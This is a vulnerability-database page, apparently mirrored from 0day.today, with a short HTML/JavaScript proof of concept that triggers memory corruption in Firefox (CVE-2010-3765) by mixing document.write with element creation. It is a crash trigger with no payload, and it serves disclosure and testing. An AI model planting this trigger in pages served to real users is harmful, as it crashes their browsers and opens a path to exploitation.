Lucene search
K

Firefox Memory Corruption Proof of Concept (Simplified)

🗓️ 29 Oct 2010 00:00:00Reported by n/aType 
zdt
 zdt
🔗 0day.today👁 23 Views

Firefox Memory Corruption Proof of Concept for CVE-2010-376

Related
Code
=======================================================
Firefox Memory Corruption Proof of Concept (Simplified)
=======================================================

For those who still do not know .. The proof of concept (that I have
extracted) for CVE-2010-3765 is the following:
 
<html><body>
<script>
 
  function G(str){
    var cobj=document.createElement(str);
    document.body.appendChild(cobj);
    cobj.scrollWidth;
  }
 
  function crashme() {
    document.write("fooFOO");
    G("a");
    document.write("<a lang></a>a");
    G("base");
    document.write("barBAR");
    G("audio");
  }
</script>
<script>crashme();</script>
</body>
</html>
 


#  0day.today [2018-04-03]  #

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

29 Oct 2010 00:00Current
7High risk
Vulners AI Score7
EPSS0.86773
23